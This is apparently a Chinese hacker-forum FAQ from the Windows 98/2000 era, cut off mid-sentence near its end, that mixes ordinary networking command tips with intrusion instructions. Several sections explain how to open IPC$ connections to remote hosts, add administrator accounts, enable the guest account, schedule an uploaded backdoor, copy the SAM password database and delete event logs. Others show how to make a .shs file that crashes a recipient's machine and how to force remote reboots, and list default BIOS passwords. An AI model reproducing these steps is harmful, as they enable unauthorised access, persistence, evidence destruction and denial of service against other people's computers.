|
1)如何查看本機(jī)所開端口: 用netstat -a —n命令查看!再stat下面有一些英文,,我來(lái)簡(jiǎn)單說(shuō)一下這些英文具體都代表什么 LISTEN:偵聽來(lái)自遠(yuǎn)方的TCP端口的連接請(qǐng)求 SYN-SENT:再發(fā)送連接請(qǐng)求后等待匹配的連接請(qǐng)求 SYN-RECEIVED:再收到和發(fā)送一個(gè)連接請(qǐng)求后等待對(duì)方對(duì)連接請(qǐng)求的確認(rèn) ESTABLISHED:代表一個(gè)打開的連接 FIN-WAIT-1:等待遠(yuǎn)程TCP連接中斷請(qǐng)求,,或先前的連接中斷請(qǐng)求的確認(rèn) FIN-WAIT-2:從遠(yuǎn)程TCP等待連接中斷請(qǐng)求 CLOSE-WAIT:等待從本地用戶發(fā)來(lái)的連接中斷請(qǐng)求 CLOSING:等待遠(yuǎn)程TCP對(duì)連接中斷的確認(rèn) LAST-ACK:等待原來(lái)的發(fā)向遠(yuǎn)程TCP的連接中斷請(qǐng)求的確認(rèn) TIME-WAIT:等待足夠的時(shí)間以確保遠(yuǎn)程TCP接收到連接中斷請(qǐng)求的確認(rèn) CLOSED:沒(méi)有任何連接狀態(tài) 2)如何獲得一個(gè)IP地址的主機(jī)名? 利用ping -a ip 命令查看,!再第一行的pinging后面的 『ip』前面的英文就是對(duì)方主機(jī)名,! 同樣道理,利用ping machine_name也可以得到對(duì)方的ip 獲得一個(gè)網(wǎng)站的ip地址的方法是:ping www.***.com 比如想知道sohu的ip,,就用ping http://www.sohu.com/來(lái)查看就可以了 順便說(shuō)一句:如果返回:Reply from *.*.*.*: TTL expired in transit的話,,呵呵,,代表TTL(生命周期)在傳輸過(guò)程中過(guò)期 什么意思呢?我來(lái)解釋一下,! 導(dǎo)致這個(gè)問(wèn)題出現(xiàn)的原因有兩個(gè):1)TTL值太?。TL值小于你和對(duì)方主機(jī)之間經(jīng)過(guò)的路由器數(shù)目,。 2)路由器數(shù)量太多,,經(jīng)過(guò)路由器的數(shù)量大于TTL值! 呵呵,,其實(shí)這兩點(diǎn)是一個(gè)意思,!只不過(guò)說(shuō)法不同而已! 3)如何查看本機(jī)的ip地址,? 用ipconfig來(lái)查看就可以! 也可以再Windows中的開始菜單,,運(yùn)行中輸入winipcfg,,同樣可以看到自己的ip ipconfig命令后面如果加一個(gè)參數(shù) /all的話,可以得到更加詳細(xì)的資料,,比如DNS,、網(wǎng)關(guān)等…… 4)再使用net命令的時(shí)候遇到一些錯(cuò)誤代碼,如何查看對(duì)應(yīng)的錯(cuò)誤信息,? 用命令 net helpmsg erorr_code來(lái)查看就可以了 比如錯(cuò)誤代碼為:88 則查看命令為:net helpmsg 88 下面有這個(gè)錯(cuò)誤代碼的中文顯示,! 5)利用telnet連接到對(duì)方主機(jī)上,想獲得一些系統(tǒng)信息,,用什么命令,? set命令可以很好的完成你所需要收集信息的任務(wù)的! 方法:再cmd下直接輸入set(telnet對(duì)方主機(jī)以后,,也是直接set就可以了~然后能夠得到NNNNN多的信息) 再這里,,computername:呵呵,還用說(shuō)么,?主機(jī)名,! OS=Windows_NT :操作系統(tǒng)的類型哦~ path=C:\perl\bin\ :(perl的解釋器位置!) systemDrive=c: 操作系統(tǒng)盤符,! USERNAME=coldcrysky 當(dāng)前登陸使用機(jī)器的用戶 …… (6)跟蹤路由器的命令是什么,? tracert 格式:tracert ip 中間會(huì)列出所有經(jīng)過(guò)的路由器列表!這些路由器如果是暴露再防火墻外面的話,,還可以看到路由的IP哦~呵呵(這里又涉及到了另外一個(gè)問(wèn)題:為什么要把路由放在防火墻后面,?原因呢,主要有兩點(diǎn):1)保護(hù)路由器,!因?yàn)楝F(xiàn)在越來(lái)越多的攻擊和入侵已經(jīng)開始瞄準(zhǔn)路由器了~如果直接把路由暴露在外面,,呵呵,,是非常危險(xiǎn)的!被DoS了就不好了啊~呵呵,,所以要放在防火墻里面,;2)為路由器減少負(fù)擔(dān)!如果所有的過(guò)濾功能統(tǒng)統(tǒng)都?jí)涸诼酚善魃厦?,呵呵,,路由器的?fù)擔(dān)就太大了!) 當(dāng)然,,利用pathping也可以達(dá)到同樣效果,!格式與tracert一樣! 7)簡(jiǎn)單介紹一下cookie,! cookie,,又名小甜點(diǎn)。 它的作用:記錄訪問(wèn)者的一些信息,。例如利用cookie記錄你所登陸這個(gè)網(wǎng)頁(yè)的次數(shù),、登陸時(shí)曾經(jīng)輸入的信息…… 最常見的是,大家再登陸論壇(郵箱)的時(shí)候,,經(jīng)常在輸入第一個(gè)字母的時(shí)候,,往往下面就顯示出了所有在本機(jī)登陸過(guò)該論壇(郵箱)的用戶名吧?呵呵,,這個(gè)就是cookie的作用,! 大家在Administrator的cookies目錄中可以看到很多的記事本文檔吧?這些都是cookie,,雖然經(jīng)過(guò)了加密,,但是仔細(xì)查找的話,仍然能夠看到一些敏感信息,!況且現(xiàn)在也已經(jīng)有了專門查看cookie的軟件,!利用這些軟件,你的隱私將不保哦~ 那么,,如何清除cookie呢,?一般情況下,可以在Internet選項(xiàng)中的常規(guī)選項(xiàng)卡中看到一個(gè)刪除cookies的按鈕,,點(diǎn)擊就可以清楚掉了~ 除此以外,,還要在internet選項(xiàng)中的內(nèi)容選項(xiàng)卡中找到自動(dòng)完成按鈕,把里面的四項(xiàng)都選中,!然后點(diǎn)擊清除表單,,清除密碼~ 然后到操作系統(tǒng)目錄所在的分區(qū)中!進(jìn)入Winnt(98為windows)目錄(當(dāng)然了,,這些都是默認(rèn)的目錄,!如果你安裝的時(shí)候改名了,,就對(duì)應(yīng)的去相應(yīng)目錄)之后找到Temporary Internet Files目錄(2000的目錄在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目錄下找Temporary Internet Files就可以了~,找到這個(gè)文件夾后,,打開,!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,,這些是你瀏覽過(guò)的網(wǎng)頁(yè)的記錄(有的時(shí)候從網(wǎng)站上面看到漂亮的FLASH,,可是不能保存怎么辦?只要在線瀏覽一遍以后,,斷線到這里來(lái)找*.swf,,之后依次打開查看的話,相信你會(huì)找到你所需要的FLASH的?。?,好了,跑題了~繼續(xù)說(shuō):這些文件是網(wǎng)站的頁(yè)面記錄,,直接刪除就可以了,! 另外,有沒(méi)有徹底禁止cookie的方法呢,? 呵呵,當(dāng)然有了,!在IE的Internet選項(xiàng)中,,找到隱私選項(xiàng)卡!,,把里面的滑塊拖到最上面,,邊上寫著:阻止所有cookie,,呵呵,是不是? 另外一種方法:找到Windows目錄下的cookies目錄,!把里面的txt文件全部刪除!,,最后應(yīng)該只剩下一個(gè)index.dat文件,!之后把這個(gè)文件夾設(shè)置成只讀就可以了~ 不過(guò),禁止cookie后,,大部分的論壇都無(wú)法正常登陸了?。『呛?,到底禁止不禁止就看你自己的了~ 8)安裝2000的時(shí)候,,速度會(huì)特別特別特別慢,怎么加快安裝速度呢,? 在DOS上面安裝,,應(yīng)該用98啟動(dòng)光盤來(lái)引導(dǎo)系統(tǒng),!然后按照下面的方法來(lái)做,可以提高安裝速度: g:\>cd windows -------假設(shè)G為光驅(qū) windows為98的安裝目錄,! g:\windows>smartdrv -------加載smartdrv程序,!加載后沒(méi)有任何提示信息!只要不返回錯(cuò)誤信息就是加載成功了~這時(shí)候安裝2K的話,,速度會(huì)很快的哦~ 9)Windows2K密碼忘記了,,如何才能進(jìn)入系統(tǒng)? Windows2K的用戶配置信息和密碼保存在SAM文件里,!該文件位于:c:\winnt\system32\config目錄中,!只要?jiǎng)h除這個(gè)文件就可以了~ 另外,在c:\winnt\repair目錄中也同樣有一個(gè)SAM文件(這個(gè)是前者的備份?。┤绻阍诘顷懭怆u的時(shí)候,,copy前面那個(gè)目錄中的SAM文件,你會(huì)發(fā)現(xiàn)COPY不下來(lái),!呵呵,,為什么?因?yàn)檫\(yùn)行著的2K系統(tǒng)會(huì)保護(hù)SAM文件啊~這個(gè)時(shí)候你就COPY這個(gè)就可以了,! 10)ping不到,,tracert不到,但是卻能用nbtstat顯示對(duì)方的一些信息,,為什么,? 因?yàn)閠racert和ping命令使用的是ICMP協(xié)議!而nbtstat是通過(guò)對(duì)方的netbios端口來(lái)獲得對(duì)方的主機(jī)信息的,!使用的是UDP和TCP協(xié)議,!如果對(duì)方僅僅只對(duì)ICMP協(xié)議做了禁止的話,那通過(guò)這個(gè)命令獲得系統(tǒng)信息是正常的,! 11)telnet上去后,,如何給對(duì)方開共享? 開共享的命令如下:net share c=c:\winnt\system 返回共享成功 之后直接利用\\ip\c來(lái)訪問(wèn)對(duì)方的system目錄了~刪除共享用 share c /del 命令就可以了 12)如何判斷對(duì)方的具體操作系統(tǒng)版本,? 首先用ver命令查看對(duì)方的版本號(hào),! 如果是5.00.2195的話,為2K,;5.1.2600為XP 從這里可以區(qū)分出來(lái)到底是2K還是XP了~下面進(jìn)行更加具體的區(qū)分,! 2K的pro和svr版本區(qū)分: 在telnet下,net shart查看啟動(dòng)的服務(wù)~如果對(duì)方開啟了Terminal Services服務(wù)的話,,基本上可以判斷為svr以上的版本了~如果沒(méi)有開啟,,則為pro!(具體方法有三種,,因?yàn)榍皫滋煸谡搲形一貜?fù)過(guò)暗界了~所以這里就不再重復(fù)了~) XP的pro和home版的區(qū)分: home edition是無(wú)法安裝iis的,!所以,,可以通過(guò)iis服務(wù)來(lái)判斷到底是home版或者是pro了~ 當(dāng)然了,如果對(duì)方是pro,,但是將iis刪除(停用)的話,,就沒(méi)辦法判斷了~呵呵 13)如何查看98的隨機(jī)啟動(dòng)的程序? 在98下有一個(gè)實(shí)用配置程序(msconfig),,中文名為:系統(tǒng)配置實(shí)用程序,,調(diào)用的方法是在:開始--運(yùn)行中輸入msconfig,在里面,,有一個(gè)啟動(dòng)的選項(xiàng)卡,,點(diǎn)擊后,可以看到很多隨即啟動(dòng)程序,,如果前面帶有鉤的話,,就是啟動(dòng)時(shí)隨機(jī)啟動(dòng)的,取消的話就是把前面的小鉤去掉就可以了~(如果在這里查看到了一些未知的啟動(dòng)文件--比如沒(méi)有文件的具體路徑,,或者沒(méi)有文件名的話,,最好取消它的自啟動(dòng)!因?yàn)楹苡锌赡苁悄抉R?。?br> 除了這里以外,,還有config.sys、autoexec.bat,、system.ini,、win.ini幾個(gè)選項(xiàng)卡,他們分別對(duì)應(yīng)這幾個(gè)文件,!只不過(guò)在這里更方便查看而已! 14)設(shè)置了BIOS密碼,,可是卻忘記了,,該怎么辦? 如果是可以進(jìn)入Windows的話,,可以找找biospwds和cmospwd這兩個(gè)軟件看看~ 還有利用DEBUG法: 簡(jiǎn)單介紹兩種: 1)-o 70 16 -o 71 13 -q 2)-o 70 16 -o 71 16 -q 另一種方法:copy法: copy con cmos.com 輸入下面10個(gè)字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,,然后按下F6并回車,退出,,運(yùn)行這個(gè)cmos.com程序就可以了~ 恩,,如果不能進(jìn)入Windows怎么辦呢? 簡(jiǎn)單介紹兩種方法: 1)用通用密碼: Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589 AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I. 這是常見的密碼,,不妨試試~ 如果不行的話,,可以利用CMOS放電: 就是把主板上的電池取下來(lái),等一會(huì)兒再插上去~ 15)如何自制一個(gè)讓98藍(lán)屏的炸彈,? 恩,,這個(gè)是前幾天QQ上面朋友問(wèn)我的問(wèn)題,,整理的時(shí)候突然間想起來(lái)了,就寫一下好了~ 首先,,打開Word,,再插入菜單中選擇對(duì)象,這時(shí),,彈出對(duì)象包裝程序窗口,,再這個(gè)窗口中,點(diǎn)擊導(dǎo)入,,隨便找一個(gè)文本或者程序就可以,!之后點(diǎn):編輯菜單。這里選擇命令行,,出現(xiàn)一個(gè)命令行窗口,,在里面協(xié)商c:\con\con,點(diǎn)擊保存,,完成后,,再點(diǎn)編輯包中的復(fù)制包,把他隨便到一個(gè)地方復(fù)制下來(lái),,之后看到的是一個(gè)名位片斷的東西,!給這個(gè)文件起一個(gè)名字,呵呵,,傳給那個(gè)可憐的家伙吧,,等待他藍(lán)屏,掉線,! (這個(gè)命令行中可以插入很多的命令,,不見得非要用這個(gè)98藍(lán)屏漏洞哦~)順便說(shuō)一下:這個(gè)已經(jīng)不是什么新鮮的技術(shù)了,這個(gè)技術(shù)的名字叫做:碎片對(duì)象,。呵呵,,碎片?記憶碎片么,?不是的,!他的后綴是:.shs!之所以說(shuō)一下這個(gè),,是因?yàn)橛械呐笥堰€不知道~做一個(gè)整理而已,!不知道的朋友看過(guò)后就知道了,知道的朋友就權(quán)當(dāng)復(fù)習(xí)了~另外,,不要利用這個(gè)方法做破壞,!否則后果自負(fù)! 16)如何再命令行下殺死對(duì)方進(jìn)程? 利用微軟的2K以上操作系統(tǒng)都是含有這個(gè)工具的,!該工具包含在2K光盤的\support\tools文件夾下,!里面有安裝程序,點(diǎn)擊后,,就安裝了2K的support tools工具包,,里面有kill這個(gè)工具,這時(shí)候再cmd下可以輸入kill/?,,就可以看到幫助了,,使用這個(gè)命令的格式是:kill pid (pid是進(jìn)程的ID號(hào)!)再任務(wù)管理器中可以看到進(jìn)程的ID號(hào)?。ú恢烙袔孜慌笥延眠^(guò)藍(lán)色火焰,?呵呵,用法跟這個(gè)一摸一樣,!還有很多類似的木馬,、后門軟件都有類似的功能!這個(gè)是windows自帶的大木馬『后門工具』而已?。?br> 這時(shí)候,,有朋友問(wèn)了,那再命令行下如何查看進(jìn)程呢,?呵呵,,這就用到了系統(tǒng)自帶的有一個(gè)后門工具了:再剛才說(shuō)得那個(gè)目錄中,還有一個(gè)工具叫tlist 看名字就能看出來(lái)是干什么的吧,?用法更簡(jiǎn)單,!直接輸入tlist就可以得到pid遇隊(duì)形程序的列表了~ 那對(duì)方機(jī)器如果沒(méi)有安裝這兩個(gè)程序怎么辦呢?沒(méi)關(guān)系,,你把你操作系統(tǒng)盤符下面programfiles\support tools目錄下面的這兩個(gè)對(duì)應(yīng)的exe文件上傳到對(duì)方的winnt\system32目錄中就可以了,!呵呵~ 17)上次說(shuō)了ping的基本用法,這次談?wù)刾ing的命令參數(shù),! 這個(gè)是本次問(wèn)題集的重點(diǎn)部分,!無(wú)論是小鳥還是老鳥,你們能保證你真的對(duì)這些參數(shù)了如指掌么,?恐怕都未必!還是好好看看吧,! 這是TCP/IP協(xié)議中最有用的命令之一 它給另一個(gè)系統(tǒng)發(fā)送一系列的數(shù)據(jù)包,,該系統(tǒng)本身又發(fā)回一個(gè)響應(yīng),這條實(shí)用程序?qū)Σ檎疫h(yuǎn)程主機(jī)很有用,,它返回的結(jié)果表示是否能到達(dá)主機(jī),,宿主機(jī)發(fā)送一個(gè)返回?cái)?shù)據(jù)包需要多長(zhǎng)時(shí)間。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.(除非人為中止,,否則一直ping下去) -a Resolve addresses to hostnames.(把IP轉(zhuǎn)為主機(jī)名) -n count Number of echo requests to send.(響應(yīng)請(qǐng)求的數(shù)量) -l size Send buffer size.(封包的大?。? -f Set Don`t Fragment flag in packet.(信息包中無(wú)碎片) -i TTL Time To Live.(時(shí)間) -v TOS Type Of Service.(服務(wù)類型) -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.(較嚴(yán)格的……唉,,怎么譯好……算了,放著吧) -w timeout Timeout in milliseconds to wait for each reply.(timeout的時(shí)間) 比如大家可能都知道的一個(gè)命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國(guó)佬時(shí)所用的命令(當(dāng)然這樣只會(huì)造成我方自己的網(wǎng)絡(luò)阻塞),。 其實(shí)這個(gè)命令主要是用來(lái)看對(duì)方應(yīng)答的速度,,如果怎么ping 得到的結(jié)果都是request time out。那恐怕你根本就不用你去找這臺(tái)主機(jī)了,,它不在你的射程之內(nèi),。 18)如何查看本機(jī)的DNS服務(wù)器? ipconfig其實(shí)是可以的(呵呵,,上次就介紹過(guò)這個(gè)命令),,除此以外,還可以利用一個(gè)命令:再cmd下輸入netsh,,進(jìn)入到netsh>提示符,,再輸入:int ip 進(jìn)入到interface ip> 然后再次輸入dump,這時(shí)候屏幕上出現(xiàn)當(dāng)前連接的配置情況了 這里必須介紹一下netsh到底是作什么用的,!這個(gè)命令比較復(fù)雜,,他包含了很多的子命令,所以這里只對(duì)部分命令進(jìn)行講解: 1)查看本機(jī)IP:首先鍵入netsh,,再netsh>提示符下輸入:interface 回車 之后:ip 回車 再之后:show address 回車 這樣,,就可以看到當(dāng)前連接的IP地址和子網(wǎng)掩碼。(其實(shí)這個(gè)命令不如ipconfig簡(jiǎn)單,,也不如ipconfig/all全面) 2)修改網(wǎng)絡(luò)配置:接著上面的命令,,我們使用:set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當(dāng)前的IP地址,,用show address來(lái)看看(或者用ipconfig) 3)顯示一個(gè)完整的網(wǎng)絡(luò)配置教本: 剛才說(shuō)過(guò),,第一個(gè)命令顯示的信息不如ipconfig/all全面,不用著急,,netsh再打印顯示網(wǎng)絡(luò)配置上,,還是有自己的特色的!例如:再interface ip>狀態(tài)下輸入:dump,,會(huì)顯示一個(gè)清單,,顯示所有本地連接(不管你是否使用~)與netstat -an不完全一樣! 這就是netsh的簡(jiǎn)單介紹和最基礎(chǔ)的用法,!希望大家能夠掌握,!還可以輸入?來(lái)查看幫助?。ㄒ趎etsh>提示符下才能查看幫助啊~) 19)肉雞上的部分文件無(wú)法刪除,,怎么辦? 如果對(duì)方的文件夾是只讀的話,會(huì)出現(xiàn)拒絕訪問(wèn)的字樣,!這時(shí)候,,我們可以再del命令后面加上/f參數(shù)來(lái)刪除! 20)再說(shuō)一個(gè)可以限制用戶登陸時(shí)間的命令,! 再net命令中就可以實(shí)現(xiàn)這樣的功能,!具體方法如下: 假如我們打算讓:coldcrysky這個(gè)用戶再周日到周易的上午八點(diǎn)到下午四點(diǎn)之間可以登陸,用這個(gè)命令: net user coldcrysky /timesunday-monday,08:00-16:00 之后利用net user coldcrysky命令來(lái)查看登陸時(shí)間的限制,,可以看到是我們所規(guī)定的時(shí)間(因?yàn)槭侵形牡?,很容易懂,我就不多廢話了) 在此,,特別提醒各位:命令中:星期日才是一周的開始?。?!不要當(dāng)成星期一,! 光說(shuō)了怎么設(shè)置,如果想恢復(fù)回去怎么辦呢,?(就是恢復(fù)成默認(rèn)狀態(tài),,任何時(shí)間都可以登陸的狀態(tài)) 看我的:net user coldcrysky /time:all --這樣就可以了~ 22)如何刪除windows2K的默認(rèn)貢獻(xiàn)? 首先打開記事本,,輸入如下內(nèi)容: net share c$ /delete net share d$ /delete net share e$ /delete net share f$ /delete net share g$ /delete net share ipc$ /delete net share admin$ /delete 這里的c$,、d$、e$……是代表默認(rèn)共享的盤符~又幾個(gè)就設(shè)置幾個(gè)就可以了~ 之后點(diǎn)擊保存成批處理文件(后綴為:bat的文件?。?!加入到啟動(dòng)組中就可以了~ 23)139端口的又一用法 呵呵,寫這個(gè)帖子的原因是因?yàn)槲掖饝?yīng)給一個(gè)朋友回復(fù)139端口的作用來(lái)著……先聲明兩點(diǎn):1)不要利用本帖所提到的方法去搞惡意破壞,!2)呵呵,,可能許多人已經(jīng)知道了139端口這個(gè)用法了~本文只想起到一個(gè)拋磚引玉的作用! 廢話不多說(shuō)了~開始: 如果你使用NT主機(jī)的話,,那你可要注意了,! 重啟NT主機(jī)的方法如下: 1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username" 建立一個(gè)IPC連接 2:net use H: \\XXX.XXX.XXX.XXX\C$ 將對(duì)方的C盤映射為自己的h盤 3:copy c on h:\reboot.bat Iisreset /reboot CTRL+Z 在對(duì)方的C盤上生成一個(gè)能重啟機(jī)器的文件 4:net time \\XXX.XXX.XXX.XXX 得到對(duì)方機(jī)器時(shí)間 5:at \\XXX.XXX.XXX.XXX 重啟的時(shí)間 c:\reboot.bat 設(shè)定對(duì)方重啟的時(shí)間! 6:at \\XXX.XXX.XXX.XXX 查看任務(wù)上面是否添加了這個(gè)任務(wù) 7:等對(duì)方重啟好了~ 上面的第三步是only for Win2K的,,如果是Nt,,就需要用意個(gè)指定的重啟程序,我們可以自己編寫一個(gè)reboot.exe來(lái)代替reboot.bat,,代碼如下: #include "stdio.h" #include "windows.h" int main() { 文件://定義重啟的時(shí)候發(fā)送給所有用戶的消息 LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";; 文件://嘗試用最簡(jiǎn)單的API函數(shù)重啟 if(ExitWindowXXX(EWX_REBOOT.0))return TRUE; if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE; 文件://因?yàn)樯厦娴闹貑⒉怀晒?,所以需要調(diào)整本進(jìn)程的特權(quán) HANDLE hToken; TOKEN_PRIVILEGES tkp; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE; 文件://獲取重啟的特權(quán) SE_SHUTDOWN_NAME LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1; tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0); 文件://判斷是NT內(nèi)核還是9X內(nèi)核,選擇用不同的方式 if(!GetVersion()& 0x80000000)) InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE); else if (!ExitWindowXXX(EWX_REBOOT,0)) if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0)) return FALSE; return TRUE; 對(duì)了,,再次說(shuō)明啊,,別用本文提到的方法搞破壞,小心警察叔叔打PP~呵呵 24)利用批處理文件來(lái)建立一個(gè)記錄3389登陸者信息的記錄器 由于Terminal Service默認(rèn)是沒(méi)有日志記錄的,,只能依靠他的系統(tǒng)日志,,但是系統(tǒng)日志只能記錄一些大動(dòng)作(開啟或停止服務(wù)),那么,,如何用批處理文件來(lái)編寫一個(gè)將是3389端口的程序呢,?很簡(jiǎn)單: 建立一個(gè)批處理文件:內(nèi)容如下: @echo off date/t >> c:\3389log.txt :TS3389 time/t >> c:\3389log.txt netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt goto :TS3389 之后保存! 如果有人用你的3389登陸你的機(jī)器,,呵呵,,在c盤下就有3389log.txt這個(gè)文件!記錄了當(dāng)天日志,,還有連接時(shí)間……資料~開始反擊~呵呵 25)網(wǎng)絡(luò)命令小節(jié) A,、NET命令: IPC連接:格式 net use \\對(duì)方IP\ipc$ "密碼" user:"用戶名" 『建立IPC連接~』 net use \\對(duì)方IP\ipc$ /delete 『斷開連接~』 以下操作需要在連接到對(duì)方主機(jī)后才可進(jìn)行!??! net user coldcrysky xyz /add 『在連接的目標(biāo)主機(jī)中加入一個(gè)用戶名為COLDCRYSKY 密碼為WYZ的用戶』 net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著權(quán)限的提高啊?。,。_^』 net use z:\\對(duì)方IP\C$ 『把對(duì)方的C盤映射為本機(jī)的Z盤-可依照需要更改映射盤符,!』 net start telnet 『開啟TELNET』 net user guest /active:yes 『激活GUEST』 net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』 B,、AT命令: 查看遠(yuǎn)程機(jī)時(shí)間:net time \\對(duì)方IP 加入一項(xiàng)新任務(wù): at \\對(duì)方IP 時(shí)間 文件名 『用來(lái)把自己上傳的后門程序在制定時(shí)間運(yùn)行,方便以后進(jìn)入肉雞,!』 C,、TELNET命令: telnet 對(duì)方IP 端口 『作用不用我說(shuō)了吧?,?,?』 D、FTP命令: 登陸:ftp 對(duì)方網(wǎng)址(IP地址) 上傳文件:get 文件在本機(jī)完整路徑 對(duì)方文件存放完整路徑 下載文件:put 對(duì)方文件完整路徑 本機(jī)存放文件路徑 E,、COPY命令: 在建立連接后(尤其是IPC$連接后,,很有用的命令哦~) ⑴copy index.htm \\127.0.0.1\c$\index.htm 『將本機(jī)index.htm文件復(fù)制到127.0.0.1的C盤下,如果要放到對(duì)方的NT目錄下,,則把C改為admin$』 ⑵copy \\127.0.0.1\admin\repair\sam_ c: 『將遠(yuǎn)程機(jī)數(shù)據(jù)庫(kù)文件拷貝到本機(jī)C盤根目錄下』F,、SET命令: 主要用于分析目標(biāo)計(jì)算機(jī)的基本信息用!具體使用方法請(qǐng)查找相關(guān)文件,! G,、NBTSTAT命令: nbtstat -A 對(duì)方IP (這個(gè)A大寫) 『在其中顯示<037>前面的英文或數(shù)字就是計(jì)算機(jī)名稱!當(dāng)然,,也可以利用PING -A 對(duì)方ip的方法來(lái)查看對(duì)方主機(jī)名,!效果相同?。?!』 H,、SHUTDOWN命令: 『用來(lái)關(guān)閉對(duì)方NT服務(wù)的命令』格式如下: shutdown \\IP地址 t:20 『20秒后自動(dòng)關(guān)閉對(duì)方NT服務(wù)!由于對(duì)對(duì)方機(jī)器影響較大,,慎用?。?!』 I,、DIR命令: 還用我說(shuō)么?大家是不是早就該掌握了,?,??(不知道的還是查閱相關(guān)資料吧~~~) J,、ECHO命令: echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內(nèi)容』 echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』 K,、ATTRIB命令: 更改文件屬性用,格式: Attrib -r index.htm 『去掉只讀屬性』(+- 分別代表增加和減少) L,、DEL命令: 『刪除日志的時(shí)候用,!』 del c:\winnt\system32\logfiles\*.* del c:\winnt\system32\config\*.evt del c:\winnt\system32\dtclog\*.* del c:\winnt\system32\*.log del c:\winnt\system32\*.txt del c:\winnt\*.txt del c:\winnt\*.log M、PING命令: -t :ping制定IP,,知道網(wǎng)絡(luò)斷開或按CTRL+C結(jié)束,! -a :解釋PING IP的主機(jī)名 -n count :發(fā)送count指定的ECHO數(shù)據(jù)包,默認(rèn)為4個(gè),! 26)這里我必須(或者說(shuō)不得不重新重申一個(gè)命令,!不過(guò)說(shuō)之前我要把這個(gè)命令的相關(guān)命令稍微介紹一下!) 我要說(shuō)的命令就是:開啟服務(wù)和停止服務(wù)的net start and net stop 這兩個(gè)命令大多數(shù)朋友已經(jīng)很熟悉了吧,?不過(guò)為了方便更多的菜鳥能看明白我要說(shuō)的意思,,不用再看其他相關(guān)文章,所以我簡(jiǎn)單說(shuō)兩句:net start是開啟服務(wù),!那么,,如何開啟呢?比如,,我們這里要開啟telnet服務(wù),,那就直接再2K的cmd下輸入:net start telnet就OK了~關(guān)閉一項(xiàng)服務(wù)的話,把start換成stop就OK了~不過(guò)這里必須要注意:你所關(guān)閉的服務(wù)必須是已經(jīng)開啟的服務(wù)?。,。『孟袷且痪鋸U話 OK,,有了這個(gè)前提后,,下面就繼續(xù)介紹:那么,,net start和net stop到底能開啟什么服務(wù)?其實(shí)這點(diǎn)也不需要你強(qiáng)記,,記住這個(gè)命令就可以了:net help start和net help stop,,這兩個(gè)會(huì)顯示出你所能開啟的服務(wù)有那些~~ 這里比如我們查到了這個(gè)服務(wù)“CLIENT SERVICE FOR NETWARE”,那么當(dāng)這個(gè)命令使用net start和net stop的時(shí)候,,你必須在這項(xiàng)服務(wù)上面加上“”,原因是因?yàn)檫@個(gè)服務(wù)名稱中帶有空格,!如果服務(wù)名稱中不帶空格,,你可以不用帶這個(gè)引號(hào)!??!這點(diǎn)是我強(qiáng)調(diào)的問(wèn)題!大家一定不要忘記了,!『前些天看到S8S8.net的黑白新區(qū)中有人說(shuō)net start 和 net stop后面的服務(wù)名必須帶空格是錯(cuò)誤的,!明白原因了吧?』 27)關(guān)于雙系統(tǒng)的兩個(gè)問(wèn)題: A,、如何在雙系統(tǒng)(98,、2000)中安全刪除2K? 先制作一張Windows 98 的啟動(dòng)軟盤,,再用它啟動(dòng)你的計(jì)算機(jī),,運(yùn)行sys命令恢復(fù)Windows 98引導(dǎo)記錄后,再運(yùn)行fdisk/mbr恢復(fù)主引導(dǎo)記錄,,完成后進(jìn)入Windows 98,,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini,、bootfont.bin,、ntldr、nydetect.com,、bootsect.dos文件就行了,。 B、 Windows 98/XP雙系統(tǒng)啟動(dòng)菜單修復(fù) 1.修復(fù)前,,在BIOS中設(shè)置從光驅(qū)啟動(dòng),。用Windows XP安裝盤啟動(dòng)電腦,在加載必要的驅(qū)動(dòng)后,,出現(xiàn)Windows XP的安裝界面,。有三個(gè)選項(xiàng): (1)要現(xiàn)在開始安裝Windows XP,請(qǐng)按“Enter”鍵,。 (2)要用“恢復(fù)控制臺(tái)”修復(fù)Windows XP安裝,,按“R”鍵,。 (3)要退出安裝程序,不安裝Windows XP,,按“F3”鍵,; 2. 按“R”鍵,進(jìn)入“Microsoft Windows XP (TM) 故障恢復(fù)控制臺(tái)”界面,;故障恢復(fù)控制臺(tái)提供系統(tǒng)修復(fù)和故障恢復(fù)功能,。系統(tǒng)這時(shí)會(huì)搜尋已安裝的Windows XP系統(tǒng)文件,然后顯示搜尋結(jié)果,,并詢問(wèn)“要登錄到哪個(gè)Windows XP安裝(要取消,,請(qǐng)按Enter)”,選擇1. D:\Windows,,回車,,系統(tǒng)會(huì)再詢問(wèn)“管理員密碼”,再鍵入安裝Windows 